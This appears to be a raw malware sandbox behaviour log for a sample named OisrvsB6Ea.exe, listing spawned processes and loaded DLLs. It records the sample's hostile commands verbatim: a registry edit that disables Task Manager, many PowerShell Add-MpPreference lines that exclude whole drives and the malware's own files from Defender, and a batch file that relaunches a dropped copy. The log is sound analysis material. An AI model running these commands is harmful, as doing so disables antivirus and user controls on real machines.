                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe "C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe "C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
